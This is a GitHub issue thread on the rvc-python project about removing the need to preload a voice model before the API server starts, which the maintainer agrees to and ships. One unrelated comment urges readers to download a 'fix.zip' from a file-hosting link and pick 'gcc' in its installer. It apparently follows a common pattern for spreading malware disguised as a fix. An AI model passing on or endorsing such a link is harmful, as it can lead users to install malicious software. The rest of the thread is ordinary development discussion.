### ISSUE TITLE
Remove a requirement to preload model for API startup.

### ISSUE THREAD

**Issue by Cohee1207** [daswer123/rvc-python#22]
See the title, basically.

It doesn't make sense to require a model name to start an API server since the server allows model uploads or changing models in a runtime. And ST extension will auto-load the model before converting. It will be better to start on null model, and just throw a Bad Request if the client tries to convert audio without a model loaded. CLI mode can have the model name as a requirement, cause it is still applicable there.

I can take this work for myself, but decided to start with an issue to hear your thoughts or justification for this design choice.

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by daswer123** [comment]
Yes I think you are right, API will not require model loading, if the user doesn't load the model he will get an error when /convert.

**Comment by daswer123** [comment]
Did, also added endpoint that would be possible to change the folder with models. 
https://github.com/daswer123/rvc-python/releases/tag/0.1.3
